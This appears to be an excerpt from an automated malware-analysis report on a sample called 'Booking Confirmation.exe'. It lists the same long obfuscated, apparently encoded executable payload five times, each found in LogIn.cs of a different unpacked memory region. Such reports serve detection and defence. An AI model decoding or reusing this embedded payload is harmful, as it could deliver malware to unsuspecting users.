NNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.cs	Base64 encoded string: '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
